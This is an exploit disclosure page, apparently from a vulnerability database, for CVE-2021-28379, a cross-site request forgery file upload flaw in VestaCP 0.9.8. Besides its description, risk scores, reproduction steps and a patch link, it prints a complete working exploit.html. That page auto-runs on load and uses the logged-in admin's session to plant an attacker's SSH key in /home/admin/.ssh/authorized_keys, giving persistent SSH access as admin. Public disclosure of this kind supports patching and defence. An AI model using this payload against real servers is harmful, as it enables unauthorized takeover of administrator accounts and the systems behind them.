VestaCP 0.9.8 File Upload CSRF

2021.03.17
Credit: Fady Othman
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: VestaCP 0.9.8 - File Upload CSRF # Exploit Author: Fady Othman # Date: 16-03-2021 # Vendor Homepage: https://vestacp.com/ # Software Link: https://github.com/myvesta/vesta # Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 # CVE ID: CVE-2021-28379 # Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355 ## Description I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work. I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH. Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file. Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/" ## Steps to reproduce. 1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/. 2. Login as the admin in Firefox, then open "exploit.html". 3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin. # exploit.html <html> <head> <script> function exploit() { var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`; var fileContent = new Blob([mystring], { type: 'text/plain' }); myFormData = new FormData(); myFormData.append("files", fileContent, "authorized_keys"); fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", { method: "post", body: myFormData, credentials: "include" }); } </script> </head> <body onload="exploit();"> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top